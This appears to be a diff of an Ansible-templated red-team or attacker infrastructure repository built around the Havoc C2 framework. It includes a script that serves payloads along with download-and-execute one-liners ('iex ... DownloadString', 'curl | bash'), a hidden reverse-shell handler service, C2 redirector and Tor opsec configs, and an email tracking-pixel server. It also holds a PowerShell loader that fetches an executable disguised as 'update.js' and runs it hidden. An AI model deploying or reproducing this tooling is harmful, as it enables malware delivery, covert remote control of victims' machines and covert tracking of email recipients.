WIN_EXE=$(jq -r '.windows_exe' "$PAYLOADS_DIR/manifest.json")
|
||||
WIN_DLL=$(jq -r '.windows_dll' "$PAYLOADS_DIR/manifest.json")
|
||||
LINUX_BIN=$(jq -r '.linux_binary' "$PAYLOADS_DIR/manifest.json")
|
||||
|
||||
# Print payload info
|
||||
echo "[+] Using these Havoc payloads:"
|
||||
echo " - Windows EXE: $WIN_EXE"
|
||||
echo " - Windows DLL: $WIN_DLL"
|
||||
echo " - Linux Binary: $LINUX_BIN"
|
||||
else
|
||||
echo "[!] No manifest file found. Please run generate_havoc_payloads.sh first."
|
||||
echo "[!] Will search for payloads in $PAYLOADS_DIR..."
|
||||
|
||||
# Try to find payloads directly
|
||||
WIN_EXE=$(find "$PAYLOADS_DIR/windows" -maxdepth 1 -name "*.exe" | head -n 1)
|
||||
WIN_DLL=$(find "$PAYLOADS_DIR/windows" -maxdepth 1 -name "*.dll" | head -n 1)
|
||||
LINUX_BIN=$(find "$PAYLOADS_DIR/linux" -maxdepth 1 -type f -executable -not -path "*/\.*" | head -n 1)
|
||||
|
||||
if [ -z "$WIN_EXE" ] && [ -z "$LINUX_BIN" ]; then
|
||||
echo "[!] No Havoc payloads found. Please run generate_havoc_payloads.sh first."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Extract just the filenames
|
||||
WIN_EXE=$(basename "$WIN_EXE")
|
||||
WIN_DLL=$(basename "$WIN_DLL")
|
||||
LINUX_BIN=$(basename "$LINUX_BIN")
|
||||
fi
|
||||
|
||||
# Create temporary directory for web server
|
||||
TEMP_DIR=$(mktemp -d)
|
||||
mkdir -p $TEMP_DIR/content/windows
|
||||
mkdir -p $TEMP_DIR/content/linux
|
||||
mkdir -p $TEMP_DIR/scripts
|
||||
|
||||
# Copy payloads to web directory
|
||||
if [ -n "$WIN_EXE" ]; then
|
||||
cp "$PAYLOADS_DIR/windows/$WIN_EXE" $TEMP_DIR/content/windows/
|
||||
echo "[+] Serving Windows EXE: $WIN_EXE"
|
||||
fi
|
||||
|
||||
if [ -n "$WIN_DLL" ]; then
|
||||
cp "$PAYLOADS_DIR/windows/$WIN_DLL" $TEMP_DIR/content/windows/
|
||||
echo "[+] Serving Windows DLL: $WIN_DLL"
|
||||
fi
|
||||
|
||||
if [ -n "$LINUX_BIN" ]; then
|
||||
cp "$PAYLOADS_DIR/linux/$LINUX_BIN" $TEMP_DIR/content/linux/
|
||||
echo "[+] Serving Linux Binary: $LINUX_BIN"
|
||||
fi
|
||||
|
||||
# Copy stagers if they exist
|
||||
if [ -f "$PAYLOADS_DIR/stagers/windows_stager.ps1" ]; then
|
||||
cp "$PAYLOADS_DIR/stagers/windows_stager.ps1" $TEMP_DIR/windows_stager.ps1
|
||||
echo "[+] Serving Windows PowerShell stager"
|
||||
fi
|
||||
|
||||
if [ -f "$PAYLOADS_DIR/stagers/linux_stager.sh" ]; then
|
||||
cp "$PAYLOADS_DIR/stagers/linux_stager.sh" $TEMP_DIR/linux_stager.sh
|
||||
echo "[+] Serving Linux bash stager"
|
||||
fi
|
||||
|
||||
# Create helpful index page
|
||||
cat > $TEMP_DIR/index.html << EOL
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Havoc C2 Payload Downloads</title>
|
||||
<style>
|
||||
body { font-family: Arial, sans-serif; max-width: 800px; margin: 0 auto; padding: 20px; }
|
||||
h1 { color: #333; }
|
||||
.section { margin-bottom: 30px; padding: 20px; background-color: #f8f8f8; border-radius: 5px; }
|
||||
.warning { color: #a00; font-weight: bold; }
|
||||
code { background-color: #eee; padding: 2px 5px; border-radius: 3px; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Havoc C2 Payload Downloads</h1>
|
||||
<div class="section">
|
||||
<h2>Available Payloads</h2>
|
||||
<ul>
|
||||
<li><a href="/content/windows/$WIN_EXE">Windows Payload</a></li>
|
||||
<li><a href="/content/windows/$WIN_DLL">Windows DLL Payload</a></li>
|
||||
<li><a href="/content/linux/$LINUX_BIN">Linux Payload</a></li>
|
||||
</ul>
|
||||
</div>
|
||||
<div class="section">
|
||||
<h2>Auto-Download Scripts</h2>
|
||||
<ul>
|
||||
<li><a href="/windows_stager.ps1">Windows PowerShell Downloader</a></li>
|
||||
<li><a href="/linux_stager.sh">Linux Bash Downloader</a></li>
|
||||
</ul>
|
||||
</div>
|
||||
<div class="section">
|
||||
<h2>Quick Commands</h2>
|
||||
<p>Windows PowerShell:</p>
|
||||
<code>powershell -exec bypass -c "iex(New-Object Net.WebClient).DownloadString('http://$C2_HOST:$LISTEN_PORT/windows_stager.ps1')"</code>
|
||||
<p>Linux Bash:</p>
|
||||
<code>curl -s http://$C2_HOST:$LISTEN_PORT/linux_stager.sh | bash</code>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
EOL
|
||||
|
||||
# Start Python HTTP server in background
|
||||
cd $TEMP_DIR
|
||||
nohup python3 -m http.server $LISTEN_PORT > /dev/null 2>&1 &
|
||||
SERVER_PID=$!
|
||||
echo "[+] Started Havoc payload server with PID $SERVER_PID on $C2_HOST:$LISTEN_PORT"
|
||||
|
||||
# Print useful information for the operator
|
||||
echo "[+] Havoc payload server is now running at http://$C2_HOST:$LISTEN_PORT/"
|
||||
echo "[+] Available payloads:"
|
||||
echo " - http://$C2_HOST:$LISTEN_PORT/content/windows/$WIN_EXE (Windows EXE)"
|
||||
echo " - http://$C2_HOST:$LISTEN_PORT/content/windows/$WIN_DLL (Windows DLL)"
|
||||
echo " - http://$C2_HOST:$LISTEN_PORT/content/linux/$LINUX_BIN (Linux Binary)"
|
||||
echo ""
|
||||
echo "[+] Quick PowerShell download command:"
|
||||
echo "powershell -exec bypass -c \"iex(New-Object Net.WebClient).DownloadString('http://$C2_HOST:$LISTEN_PORT/windows_stager.ps1')\""
|
||||
echo ""
|
||||
echo "[+] Quick Linux download command:"
|
||||
echo "curl -s http://$C2_HOST:$LISTEN_PORT/linux_stager.sh | bash"
|
||||
@@ -0,0 +1,22 @@
|
||||
#!/bin/bash
|
||||
# Let's Encrypt Certificate Setup Script
|
||||
# Run this after setting up DNS records pointing to this server
|
||||
|
||||
# Replace these with your actual values if needed
|
||||
DOMAIN="{{ domain }}"
|
||||
SUBDOMAIN="{{ redirector_subdomain | default(cdn) }}"
|
||||
EMAIL="admin@${DOMAIN}"
|
||||
|
||||
echo "================================================"
|
||||
echo "Let's Encrypt Certificate Setup"
|
||||
echo "================================================"
|
||||
echo
|
||||
echo "Before running this script, make sure:"
|
||||
echo "1. DNS records are set up correctly"
|
||||
echo " - ${SUBDOMAIN}.${DOMAIN} points to $(curl -s ifconfig.me)"
|
||||
echo "2. Port 80 is open to the internet"
|
||||
echo
|
||||
echo "Run the following command to get your certificate:"
|
||||
echo "certbot --nginx -d ${SUBDOMAIN}.${DOMAIN} --non-interactive --agree-tos -m ${EMAIL}"
|
||||
echo
|
||||
echo "================================================"
|
||||
@@ -0,0 +1,28 @@
|
||||
[Unit]
|
||||
Description=Reverse Shell Handler Service
|
||||
After=network.target
|
||||
|
||||
[Service]
|
||||
Type=simple
|
||||
User=root
|
||||
Group=root
|
||||
ExecStart=/root/Tools/shell-handler/persistent-listener.sh
|
||||
Restart=always
|
||||
RestartSec=10
|
||||
|
||||
# Hide process information
|
||||
PrivateTmp=true
|
||||
ProtectSystem=full
|
||||
NoNewPrivileges=true
|
||||
|
||||
# Make shell handler hard to find
|
||||
StandardOutput=null
|
||||
StandardError=null
|
||||
|
||||
# Environment variables (configured via Ansible)
|
||||
Environment="C2_HOST={{ c2_ip | default('127.0.0.1') }}"
|
||||
Environment="LISTEN_PORT={{ shell_handler_port | default('4444') }}"
|
||||
Environment="HAVOC_PORT={{ havoc_teamserver_port | default('40056') }}"
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
@@ -0,0 +1,221 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Simple Email Tracking Server
|
||||
|
||||
A minimal Flask application that serves transparent tracking pixels
|
||||
and logs email opens with metadata.
|
||||
"""
|
||||
|
||||
import os
|
||||
import json
|
||||
import time
|
||||
import logging
|
||||
from datetime import datetime
|
||||
from flask import Flask, request, send_file, render_template_string
|
||||
|
||||
# Configure logging
|
||||
logging.basicConfig(
|
||||
level=logging.INFO,
|
||||
format='%(asctime)s - %(levelname)s - %(message)s',
|
||||
handlers=[
|
||||
logging.FileHandler('/root/Tools/tracker/data/tracker.log'),
|
||||
logging.StreamHandler()
|
||||
]
|
||||
)
|
||||
|
||||
# Create Flask app
|
||||
app = Flask(__name__)
|
||||
|
||||
# Directory to store tracking data
|
||||
DATA_DIR = '/root/Tools/tracker/data'
|
||||
os.makedirs(DATA_DIR, exist_ok=True)
|
||||
|
||||
# Path to 1x1 transparent pixel
|
||||
PIXEL_PATH = os.path.join(DATA_DIR, 'pixel.png')
|
||||
|
||||
# Create 1x1 transparent PNG if it doesn't exist
|
||||
if not os.path.exists(PIXEL_PATH):
|
||||
from PIL import Image
|
||||
img = Image.new('RGBA', (1, 1), color=(0, 0, 0, 0))
|
||||
img.save(PIXEL_PATH)
|
||||
|
||||
# Path to tracking data
|
||||
TRACKING_DATA_PATH = os.path.join(DATA_DIR, 'tracking_data.json')
|
||||
|
||||
def load_tracking_data():
|
||||
"""Load existing tracking data from JSON file"""
|
||||
if os.path.exists(TRACKING_DATA_PATH):
|
||||
try:
|
||||
with open(TRACKING_DATA_PATH, 'r') as f:
|
||||
return json.load(f)
|
||||
except json.JSONDecodeError:
|
||||
logging.error("Error loading tracking data, starting fresh")
|
||||
return {}
|
||||
|
||||
def save_tracking_data(data):
|
||||
"""Save tracking data to JSON file"""
|
||||
with open(TRACKING_DATA_PATH, 'w') as f:
|
||||
json.dump(data, f, indent=2)
|
||||
|
||||
@app.route('/pixel/<tracking_id>.png')
|
||||
def tracking_pixel(tracking_id):
|
||||
"""Serve a tracking pixel and log the request"""
|
||||
# Get client information
|
||||
user_agent = request.headers.get('User-Agent', 'Unknown')
|
||||
ip_address = request.remote_addr
|
||||
timestamp = datetime.now().isoformat()
|
||||
referer = request.headers.get('Referer', 'Unknown')
|
||||
|
||||
# Log the tracking event
|
||||
logging.info(f"Pixel loaded - ID: {tracking_id}, IP: {ip_address}")
|
||||
|
||||
# Add tracking event to data
|
||||
tracking_data = load_tracking_data()
|
||||
|
||||
if tracking_id not in tracking_data:
|
||||
tracking_data[tracking_id] = []
|
||||
|
||||
tracking_data[tracking_id].append({
|
||||
'timestamp': timestamp,
|
||||
'ip_address': ip_address,
|
||||
'user_agent': user_agent,
|
||||
'referer': referer
|
||||
})
|
||||
|
||||
save_tracking_data(tracking_data)
|
||||
|
||||
# Return the 1x1 transparent pixel
|
||||
return send_file(PIXEL_PATH, mimetype='image/png')
|
||||
|
||||
@app.route('/')
|
||||
def dashboard():
|
||||
"""Display tracking statistics dashboard"""
|
||||
tracking_data = load_tracking_data()
|
||||
|
||||
# Prepare data for the dashboard
|
||||
stats = []
|
||||
for tracking_id, events in tracking_data.items():
|
||||
stats.append({
|
||||
'id': tracking_id,
|
||||
'views': len(events),
|
||||
'last_view': events[-1]['timestamp'] if events else 'Never',
|
||||
'unique_ips': len(set(e['ip_address'] for e in events))
|
||||
})
|
||||
|
||||
# Sort by most views
|
||||
stats.sort(key=lambda x: x['views'], reverse=True)
|
||||
|
||||
# Simple HTML dashboard template
|
||||
template = """
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Email Tracking Dashboard - {{ tracker_domain }}</title>
|
||||
<style>
|
||||
body { font-family: Arial, sans-serif; margin: 0; padding: 20px; }
|
||||
h1 { color: #333; }
|
||||
table { border-collapse: collapse; width: 100%; }
|
||||
th, td { text-align: left; padding: 8px; border-bottom: 1px solid #ddd; }
|
||||
tr:hover { background-color: #f5f5f5; }
|
||||
th { background-color: #4CAF50; color: white; }
|
||||
.container { max-width: 800px; margin: 0 auto; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="container">
|
||||
<h1>Email Tracking Dashboard</h1>
|
||||
<p>To track email opens, add this HTML to your emails:</p>
|
||||
<pre><img src="https://{{ redirector_domain }}/px/YOUR_TRACKING_ID.png" height="1" width="1" /></pre>
|
||||
<p>Alternatively, use this URL with your C2 server directly:</p>
|
||||
<pre><img src="https://{{ tracker_domain }}/pixel/YOUR_TRACKING_ID.png" height="1" width="1" /></pre>
|
||||
|
||||
<h2>Tracking Statistics</h2>
|
||||
<table>
|
||||
<tr>
|
||||
<th>Tracking ID</th>
|
||||
<th>Views</th>
|
||||
<th>Unique IPs</th>
|
||||
<th>Last View</th>
|
||||
<th>Details</th>
|
||||
</tr>
|
||||
{% for stat in stats %}
|
||||
<tr>
|
||||
<td>{{ stat.id }}</td>
|
||||
<td>{{ stat.views }}</td>
|
||||
<td>{{ stat.unique_ips }}</td>
|
||||
<td>{{ stat.last_view }}</td>
|
||||
<td><a href="/details/{{ stat.id }}">View Details</a></td>
|
||||
</tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
"""
|
||||
|
||||
return render_template_string(
|
||||
template,
|
||||
stats=stats,
|
||||
tracker_domain="{{ tracker_domain }}",
|
||||
redirector_domain="{{ redirector_subdomain }}.{{ domain }}"
|
||||
)
|
||||
|
||||
@app.route('/details/<tracking_id>')
|
||||
def tracking_details(tracking_id):
|
||||
"""Display detailed tracking information for a specific ID"""
|
||||
tracking_data = load_tracking_data()
|
||||
|
||||
if tracking_id not in tracking_data:
|
||||
return f"No data found for tracking ID: {tracking_id}", 404
|
||||
|
||||
events = tracking_data[tracking_id]
|
||||
|
||||
# Simple HTML template for details
|
||||
template = """
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Tracking Details: {{ tracking_id }}</title>
|
||||
<style>
|
||||
body { font-family: Arial, sans-serif; margin: 0; padding: 20px; }
|
||||
h1, h2 { color: #333; }
|
||||
table { border-collapse: collapse; width: 100%; }
|
||||
th, td { text-align: left; padding: 8px; border-bottom: 1px solid #ddd; }
|
||||
tr:hover { background-color: #f5f5f5; }
|
||||
th { background-color: #4CAF50; color: white; }
|
||||
.container { max-width: 800px; margin: 0 auto; }
|
||||
.back { margin-bottom: 20px; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="container">
|
||||
<div class="back"><a href="/">« Back to Dashboard</a></div>
|
||||
<h1>Tracking Details: {{ tracking_id }}</h1>
|
||||
<p>Total views: {{ events|length }}</p>
|
||||
|
||||
<h2>Events</h2>
|
||||
<table>
|
||||
<tr>
|
||||
<th>Time</th>
|
||||
<th>IP Address</th>
|
||||
<th>User Agent</th>
|
||||
<th>Referer</th>
|
||||
</tr>
|
||||
{% for event in events %}
|
||||
<tr>
|
||||
<td>{{ event.timestamp }}</td>
|
||||
<td>{{ event.ip_address }}</td>
|
||||
<td>{{ event.user_agent }}</td>
|
||||
<td>{{ event.referer }}</td>
|
||||
</tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
"""
|
||||
|
||||
return render_template_string(template, tracking_id=tracking_id, events=events)
|
||||
|
||||
if __name__ == '__main__':
|
||||
app.run(host='0.0.0.0', port=5000, debug=False)
|
||||
@@ -0,0 +1,22 @@
|
||||
# TCP stream configuration for Havoc C2
|
||||
stream {
|
||||
# TCP forwarding for Havoc Teamserver
|
||||
server {
|
||||
listen {{ havoc_teamserver_port | default(40056) }};
|
||||
proxy_pass {{ c2_ip }}:{{ havoc_teamserver_port | default(40056) }};
|
||||
}
|
||||
|
||||
# Additional Havoc ports
|
||||
server {
|
||||
listen {{ havoc_http_port | default(8080) }};
|
||||
proxy_pass {{ c2_ip }}:{{ havoc_http_port | default(8080) }};
|
||||
}
|
||||
|
||||
# HTTPS for Havoc - Using a different port to avoid conflicts with web server
|
||||
server {
|
||||
# Changed from default 443 to 9443 to avoid conflict with Nginx HTTPS
|
||||
listen {{ havoc_https_port | default(9443) }};
|
||||
# Still proxy to the C2's HTTPS port
|
||||
proxy_pass {{ c2_ip }}:{{ havoc_https_port | default(443) }};
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,48 @@
|
||||
# FlokiNET/templates/torrc.j2
|
||||
#
|
||||
# Tor configuration for C2 server
|
||||
# Hardened configuration for operational security
|
||||
|
||||
# General settings
|
||||
DataDirectory /var/lib/tor
|
||||
RunAsDaemon 1
|
||||
ControlPort 9051
|
||||
CookieAuthentication 1
|
||||
CookieAuthFileGroupReadable 0
|
||||
DisableDebuggerAttachment 1
|
||||
|
||||
# Network settings
|
||||
SOCKSPort 127.0.0.1:9050
|
||||
SOCKSPolicy accept 127.0.0.1/8
|
||||
SOCKSPolicy reject *
|
||||
Log notice file /var/log/tor/notices.log
|
||||
SafeSocks 1
|
||||
TestSocks 0
|
||||
|
||||
# Circuit settings
|
||||
NumEntryGuards 4
|
||||
EnforceDistinctSubnets 1
|
||||
CircuitBuildTimeout 60
|
||||
PathsNeededToBuildCircuits 0.95
|
||||
NewCircuitPeriod 900
|
||||
MaxCircuitDirtiness 1800
|
||||
|
||||
# Security settings
|
||||
StrictNodes 1
|
||||
WarnPlaintextPorts 23,109,110,143,80,21
|
||||
ReachableAddresses *:80,*:443
|
||||
ReachableAddresses reject *:*
|
||||
ReachableAddresses accept *:80
|
||||
ReachableAddresses accept *:443
|
||||
|
||||
# Obfuscation settings
|
||||
Bridge obfs4 {{ bridge_address | default('placeholderbridge.example.org:443') }} {{ bridge_fingerprint | default('PLACEHOLDERFINGERPRINT') }} cert=PLACEHOLDER
|
||||
UseBridges 1
|
||||
ClientTransportPlugin obfs4 exec /usr/bin/obfs4proxy
|
||||
ClientTransportPlugin meek exec /usr/bin/obfs4proxy
|
||||
|
||||
# Exit policy (no exits allowed)
|
||||
ExitPolicy reject *:*
|
||||
|
||||
# DNS resolution
|
||||
AutomapHostsOnResolve 1
|
||||
@@ -0,0 +1,33 @@
|
||||
# templates/tracker-config.j2
|
||||
"""
|
||||
Email Tracker Configuration
|
||||
"""
|
||||
|
||||
# Basic Configuration
|
||||
SECRET_KEY = '{{ lookup("password", "/dev/null chars=ascii_letters,digits length=32") }}'
|
||||
DEBUG = False
|
||||
|
||||
# Database settings
|
||||
DB_NAME = 'tracker.db'
|
||||
|
||||
# Domain configuration
|
||||
DOMAIN = '{{ tracker_domain }}'
|
||||
USE_HTTPS = {{ tracker_setup_ssl | default(true) | lower }}
|
||||
|
||||
# Tracking pixel path
|
||||
TRACKING_PATH = 'pixel.png'
|
||||
|
||||
# API Keys
|
||||
{% if tracker_ipinfo_token is defined and tracker_ipinfo_token != "" %}
|
||||
IPINFO_TOKEN = '{{ tracker_ipinfo_token }}'
|
||||
{% else %}
|
||||
IPINFO_TOKEN = None
|
||||
{% endif %}
|
||||
|
||||
# Notification settings
|
||||
ENABLE_NOTIFICATIONS = False
|
||||
NOTIFICATION_EMAIL = '{{ tracker_email | default("admin@" + domain) }}'
|
||||
|
||||
# Logger configuration
|
||||
LOG_LEVEL = 'INFO'
|
||||
LOG_FILE = '/var/log/tracker.log'
|
||||
@@ -0,0 +1,52 @@
|
||||
server {
|
||||
listen 80;
|
||||
listen [::]:80;
|
||||
server_name {{ tracker_domain }};
|
||||
|
||||
# Redirect to HTTPS if SSL is enabled
|
||||
return 301 https://$host$request_uri;
|
||||
}
|
||||
|
||||
server {
|
||||
listen 443 ssl;
|
||||
listen [::]:443 ssl;
|
||||
server_name {{ tracker_domain }};
|
||||
|
||||
# SSL Configuration
|
||||
ssl_certificate /etc/letsencrypt/live/{{ tracker_domain }}/fullchain.pem;
|
||||
ssl_certificate_key /etc/letsencrypt/live/{{ tracker_domain }}/privkey.pem;
|
||||
|
||||
# Proxy to tracker app
|
||||
location / {
|
||||
proxy_pass http://127.0.0.1:5000;
|
||||
proxy_set_header Host $host;
|
||||
proxy_set_header X-Real-IP $remote_addr;
|
||||
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
|
||||
proxy_set_header X-Forwarded-Proto $scheme;
|
||||
}
|
||||
|
||||
# Specific location for tracking pixel
|
||||
location ~ ^/pixel/(.+)\.png$ {
|
||||
proxy_pass http://127.0.0.1:5000/pixel/$1.png;
|
||||
proxy_set_header Host $host;
|
||||
proxy_set_header X-Real-IP $remote_addr;
|
||||
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
|
||||
proxy_set_header X-Forwarded-Proto $scheme;
|
||||
|
||||
# Cache control - don't cache tracking pixels
|
||||
add_header Cache-Control "no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0";
|
||||
expires off;
|
||||
}
|
||||
|
||||
# Security headers
|
||||
add_header X-Content-Type-Options "nosniff" always;
|
||||
add_header X-Frame-Options "SAMEORIGIN" always;
|
||||
add_header X-XSS-Protection "1; mode=block" always;
|
||||
add_header Referrer-Policy "no-referrer" always;
|
||||
|
||||
{% if zero_logs | default(true) %}
|
||||
# Disable logging for privacy
|
||||
access_log off;
|
||||
error_log /dev/null crit;
|
||||
{% endif %}
|
||||
}
|
||||
@@ -0,0 +1,23 @@
|
||||
[Unit]
|
||||
Description=Email Tracking Server
|
||||
After=network.target
|
||||
|
||||
[Service]
|
||||
User=tracker
|
||||
Group=tracker
|
||||
WorkingDirectory=/root/Tools/tracker
|
||||
ExecStart=/root/Tools/tracker/venv/bin/python /root/Tools/tracker/simple_email_tracker.py
|
||||
Restart=always
|
||||
RestartSec=10
|
||||
|
||||
# Security settings
|
||||
PrivateTmp=true
|
||||
ProtectSystem=full
|
||||
NoNewPrivileges=true
|
||||
|
||||
# Hide process information
|
||||
StandardOutput=null
|
||||
StandardError=journal
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
@@ -0,0 +1,16 @@
|
||||
# Windows PowerShell Beacon Loader
|
||||
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12
|
||||
$ErrorActionPreference = "SilentlyContinue"
|
||||
$wc = New-Object System.Net.WebClient
|
||||
$wc.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36")
|
||||
$wc.Headers.Add("Accept-Language", "en-US,en;q=0.9")
|
||||
$wc.Headers.Add("Referer", "https://REDIRECTOR_PLACEHOLDER/")
|
||||
$url = "https://REDIRECTOR_PLACEHOLDER/static/js/update.js"
|
||||
$outpath = "$env:TEMP\update-$(New-Guid).exe"
|
||||
try {
|
||||
$wc.DownloadFile($url, $outpath)
|
||||
Start-Sleep -Milliseconds (Get-Random -Minimum 500 -Maximum 3000)
|
||||
Start-Process -WindowStyle Hidden -FilePath $outpath
|
||||
} catch {
|
||||
# Fail silently
|
||||
}
|
||||
Reference in New Issue
Block a user